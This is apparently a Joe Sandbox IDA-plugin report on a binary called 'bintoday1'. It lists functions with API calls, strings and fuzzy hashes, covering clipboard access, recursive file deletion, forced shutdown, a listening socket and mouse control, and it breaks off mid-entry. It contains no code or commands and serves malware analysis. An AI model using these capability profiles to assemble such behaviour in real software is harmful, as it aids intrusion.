Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 553a0ca27b2e07b0628d2bf9828b8954ed579bf5a8a015708dad84dc67c5ae92
Instruction ID: bfc62ab72f4ff5e3e55da8e52fe0ab1b86263e564432429d56f319613d40a377
Opcode Fuzzy Hash: 553a0ca27b2e07b0628d2bf9828b8954ed579bf5a8a015708dad84dc67c5ae92
Instruction Fuzzy Hash: 86715D7591020AABDF10AFA4DC85FBEBBB9FF04300F1445A5EA14A71A1D771A919CB60

Function 00C0EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C2CC08), ref: 00C0EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C0EB37
GetClipboardData.USER32(0000000D), ref: 00C0EB43
CloseClipboard.USER32 ref: 00C0EB4F
GlobalLock.KERNEL32(00000000), ref: 00C0EB87
CloseClipboard.USER32 ref: 00C0EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C0EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00C0EBC9
GetClipboardData.USER32(00000001), ref: 00C0EBD1
GlobalLock.KERNEL32(00000000), ref: 00C0EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 00C0EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00C0EC38
GetClipboardData.USER32(0000000F), ref: 00C0EC44
GlobalLock.KERNEL32(00000000), ref: 00C0EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C0EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C0EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C0ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C0ECF3
CountClipboardFormats.USER32 ref: 00C0ED14
CloseClipboard.USER32 ref: 00C0ED59

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 8d6934c9a286f18338921736d34d5d824e645724b44446c25770fcc75999db47
Instruction ID: 616634b8e39a6394be185011b64bcc8d7f73dadae5f42e6d98817cdb417da30a
Opcode Fuzzy Hash: 8d6934c9a286f18338921736d34d5d824e645724b44446c25770fcc75999db47
Instruction Fuzzy Hash: 5D619A35244201AFD710EF24D895F2E77E4EF84704F18496DF866972E2CB31EA06CBA2

Function 00C0698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C069BE
FindClose.KERNEL32(00000000), ref: 00C06A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C06A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C06A75

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00C06AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C06ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00C06B32
%02d, xrefs: 00C06C00, 00C06C0A, 00C06C5A, 00C06CAA, 00C06CFA, 00C06D4A
%03d, xrefs: 00C06DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00C06B6A
%4d, xrefs: 00C06BB1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: db60edd891b6d5cdd0260f8db215d54de2e7980805c90b6e9a78c210e2985411
Instruction ID: aa469b0f23107704166c84acc99deafd07fc15ffe899295820d48822632bc878
Opcode Fuzzy Hash: db60edd891b6d5cdd0260f8db215d54de2e7980805c90b6e9a78c210e2985411
Instruction Fuzzy Hash: 02D14D72508300AFC710EBA4C891EAFB7ECAF98704F44496DF599D7191EB74DA48CB62

Function 00C09642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C09663
GetFileAttributesW.KERNEL32(?), ref: 00C096A1
SetFileAttributesW.KERNEL32(?,?), ref: 00C096BB
FindNextFileW.KERNEL32(00000000,?), ref: 00C096D3
FindClose.KERNEL32(00000000), ref: 00C096DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00C096FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00C0974A
SetCurrentDirectoryW.KERNEL32(00C56B7C), ref: 00C09768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C09772
FindClose.KERNEL32(00000000), ref: 00C0977F
FindClose.KERNEL32(00000000), ref: 00C0978F

Strings

*.*, xrefs: 00C096F5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 085885c7b5be60134cc2a4b38363bc454bf1090c29ea254493498e9cfad9459f
Instruction ID: 984962cab3eb47a0a5215923598dda45e56cd0e1b7fb8a1cdd0a7de30c1dfdc3
Opcode Fuzzy Hash: 085885c7b5be60134cc2a4b38363bc454bf1090c29ea254493498e9cfad9459f
Instruction Fuzzy Hash: 5A31C232541619AFDB24EFB8DC49BEE77ACDF09321F1041A5F825E20E1DB70DA85CA54

Function 00C0979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C097BE
FindNextFileW.KERNEL32(00000000,?), ref: 00C09819
FindClose.KERNEL32(00000000), ref: 00C09824
FindFirstFileW.KERNEL32(*.*,?), ref: 00C09840
SetCurrentDirectoryW.KERNEL32(?), ref: 00C09890
SetCurrentDirectoryW.KERNEL32(00C56B7C), ref: 00C098AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C098B8
FindClose.KERNEL32(00000000), ref: 00C098C5
FindClose.KERNEL32(00000000), ref: 00C098D5

Part of subcall function 00BFDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BFDB00

Strings

*.*, xrefs: 00C0983B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 5b11f8512b74769858e120c0cb2a82583f6a24f550b49e995e714fe1e3909008
Instruction ID: adcb3069a1bac4c792576ec0e442d5d9c07c01e71770f74cb09e3dbf24f52575
Opcode Fuzzy Hash: 5b11f8512b74769858e120c0cb2a82583f6a24f550b49e995e714fe1e3909008
Instruction Fuzzy Hash: 5831B6315016196FDF20EFB4EC48BDE77ACDF06320F148265E924A31E1DB70DA85CA64

Function 00C08195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C08257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C08267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C08273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C08310
SetCurrentDirectoryW.KERNEL32(?), ref: 00C08324
SetCurrentDirectoryW.KERNEL32(?), ref: 00C08356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C0838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00C08395

Strings

*.*, xrefs: 00C0839B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 6ac2dc67fdcfee550c0258ecf0f2ac697c788f081b52d3d408ce149e76653d55
Instruction ID: d2dc37525aac33600aef0e7dec72a65abffd4877ff66058d2ed7279101e34e36
Opcode Fuzzy Hash: 6ac2dc67fdcfee550c0258ecf0f2ac697c788f081b52d3d408ce149e76653d55
Instruction Fuzzy Hash: 8F6171725143059FCB10EF64D840AAEB3E8FF89314F04896DF999D7261DB31E949CB92

Function 00BFD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B93AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B93A97,?,?,00B92E7F,?,?,?,00000000), ref: 00B93AC2

Part of subcall function 00BFE199: GetFileAttributesW.KERNEL32(?,00BFCF95), ref: 00BFE19A

FindFirstFileW.KERNEL32(?,?), ref: 00BFD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00BFD1DD
MoveFileW.KERNEL32(?,?), ref: 00BFD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00BFD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BFD237

Part of subcall function 00BFD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00BFD21C,?,?), ref: 00BFD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00BFD253
FindClose.KERNEL32(00000000), ref: 00BFD264

Strings

\*.*, xrefs: 00BFD0CD, 00BFD0D6, 00BFD0EB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 4e50399e71cf97843cc86abc0c9db4cff4b8cd5ffa2178f97e4437e310e6ccb4
Instruction ID: 0dd3b760b042304863bc6479fc00704c42beda7df89e1e16d4e11c2a8eae386a
Opcode Fuzzy Hash: 4e50399e71cf97843cc86abc0c9db4cff4b8cd5ffa2178f97e4437e310e6ccb4
Instruction Fuzzy Hash: 28615C3180510DAACF15EBA4CA92AFDB7F6AF15300F2441A9E50177191EF31AF0DCBA1

Function 00C0ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C0ED91
EmptyClipboard.USER32 ref: 00C0ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00C0EDAC
CloseClipboard.USER32 ref: 00C0EEA3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 1369c36ab8759347f52a32e3fde8c67278dfeab7cced4a3ec219c354b9c6d990
Instruction ID: 389100605fe16bd63828b0a50f27628adf4fe1e4bde464122bc107ed74676775
Opcode Fuzzy Hash: 1369c36ab8759347f52a32e3fde8c67278dfeab7cced4a3ec219c354b9c6d990
Instruction Fuzzy Hash: C9418D35204611AFE720DF15D888F19BBE5EF44318F19C499E42A8BBA2C775FD42CB90

Function 00BFE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BF170D
Part of subcall function 00BF16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BF173A
Part of subcall function 00BF16C3: GetLastError.KERNEL32 ref: 00BF174A

ExitWindowsEx.USER32(?,00000000), ref: 00BFE932

Strings

, xrefs: 00BFE95C
@, xrefs: 00BFE925
, xrefs: 00BFE920
SeShutdownPrivilege, xrefs: 00BFE902

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 26aa7bd486f67cafb3f13754e6270283560227ef08c437eb703972b80ac1dcd8
Instruction ID: 0682efd52124ac2243a577cabc538cc58f93c09a2b2c8773374aa272b23f3589
Opcode Fuzzy Hash: 26aa7bd486f67cafb3f13754e6270283560227ef08c437eb703972b80ac1dcd8
Instruction Fuzzy Hash: 5D01F732620218ABEB2426749CC9FBE72DCDB04741F148961FA22E30E1DAF09C4881A0

Function 00C11204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C11276
WSAGetLastError.WSOCK32 ref: 00C11283
bind.WSOCK32(00000000,?,00000010), ref: 00C112BA
WSAGetLastError.WSOCK32 ref: 00C112C5
closesocket.WSOCK32(00000000), ref: 00C112F4
listen.WSOCK32(00000000,00000005), ref: 00C11303
WSAGetLastError.WSOCK32 ref: 00C1130D
closesocket.WSOCK32(00000000), ref: 00C1133C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 756d67ced2f02f8380e9ccaa8ecbafa499cb84e2fc43e8629899dedbeb5c11fd
Instruction ID: 94550823ef9e0fe1470f45745aab05e7d5718c9a48141186671a1ecc97f1bd77
Opcode Fuzzy Hash: 756d67ced2f02f8380e9ccaa8ecbafa499cb84e2fc43e8629899dedbeb5c11fd
Instruction Fuzzy Hash: 394190316001409FD720DF24C488B69BBE5AF46318F188198E9669F2E6C775ED82DBE1

Function 00BCB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BCB9D4
_free.LIBCMT ref: 00BCB9F8
_free.LIBCMT ref: 00BCBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C33700), ref: 00BCBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00C6121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BCBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00C61270,000000FF,?,0000003F,00000000,?), ref: 00BCBC36
_free.LIBCMT ref: 00BCBD4B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 96d801f1f84e9d5bf796a71e552cf23ea394a034e2a762f4200902989d8bfedd
Instruction ID: 35442755fae052814dc4883cabbda6580aef36b5ee2707e86eace6f2b2b81f7d
Opcode Fuzzy Hash: 96d801f1f84e9d5bf796a71e552cf23ea394a034e2a762f4200902989d8bfedd
Instruction Fuzzy Hash: 3AC10571A04245AFDB249F798C92FAEBBE8EF41310F1841EEE895D7251EB709E41CB50

Function 00BFD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B93AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B93A97,?,?,00B92E7F,?,?,?,00000000), ref: 00B93AC2

Part of subcall function 00BFE199: GetFileAttributesW.KERNEL32(?,00BFCF95), ref: 00BFE19A

FindFirstFileW.KERNEL32(?,?), ref: 00BFD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00BFD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BFD481
FindClose.KERNEL32(00000000), ref: 00BFD498
FindClose.KERNEL32(00000000), ref: 00BFD4A1

Strings

\*.*, xrefs: 00BFD3F2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 830f0f7059e1845ceadad0197509865af933b357eba98e0127995dec25dd0f96
Instruction ID: 472e5f9151e16ca48e7bf89ab1c41c55529dc77e816cf90cd11135c42fe967b1
Opcode Fuzzy Hash: 830f0f7059e1845ceadad0197509865af933b357eba98e0127995dec25dd0f96
Instruction Fuzzy Hash: 1A3180310183459BC710EF64C8919BFB7E8BEA1304F444AADF5D593291EB30AA0DD763

Function 00BCE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00BCE645

Strings

1#SNAN, xrefs: 00BCF844
1#IND, xrefs: 00BCF83D
1#INF, xrefs: 00BCF852
1#QNAN, xrefs: 00BCF84B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 09bac1721545be20f678d88f238bc3a63530826aba28d211f724444c57eb4cf4
Instruction ID: d0681db5146ac8547dc74d142b287242a99ac5bd744c935cf9ac8011dadd55bb
Opcode Fuzzy Hash: 09bac1721545be20f678d88f238bc3a63530826aba28d211f724444c57eb4cf4
Instruction Fuzzy Hash: 46C20972E046298FDB25CE289D80BEAB7F6EB48305F1541EED45DE7241E774AE818F40

Function 00C0648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C064DC
CoInitialize.OLE32(00000000), ref: 00C06639
CoCreateInstance.OLE32(00C2FCF8,00000000,00000001,00C2FB68,?), ref: 00C06650
CoUninitialize.OLE32 ref: 00C068D4

Strings

.lnk, xrefs: 00C064BA, 00C06524, 00C065E0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 1c504a74add17151202c37fa9f6faad8fbdd99582e39f0ff8292aaa268ecad5f
Instruction ID: 939cbf5ff1ed2d2d929fb76e1769ca090b7e821db151f246c1164040b53c69ae
Opcode Fuzzy Hash: 1c504a74add17151202c37fa9f6faad8fbdd99582e39f0ff8292aaa268ecad5f
Instruction Fuzzy Hash: D8D13971508201AFC714EF24C881A6BB7E9FF98704F40496DF5958B291EB71EA49CBA2

Function 00C122DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00C122E8

Part of subcall function 00C0E4EC: GetWindowRect.USER32(?,?), ref: 00C0E504

GetDesktopWindow.USER32 ref: 00C12312
GetWindowRect.USER32(00000000), ref: 00C12319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C12355
GetCursorPos.USER32(?), ref: 00C12381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C123DF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 4eda3506575c14743b41502db8af8817aebeaa438a4ca84c88a4bb70a493f9ee
Instruction ID: b1958dee85f158e9e031cdecb8373adace1fa740a3a72825a60e4147359c8412
Opcode Fuzzy Hash: 4eda3506575c14743b41502db8af8817aebeaa438a4ca84c88a4bb70a493f9ee
Instruction Fuzzy Hash: 0631ED72104305ABC720DF54C848BAFBBADFF89310F400919F9A4A71A1DB34EA59CB92

Function 00C09B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C09B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C09C8B

Part of subcall function 00C03874: GetInputState.USER32 ref: 00C038CB
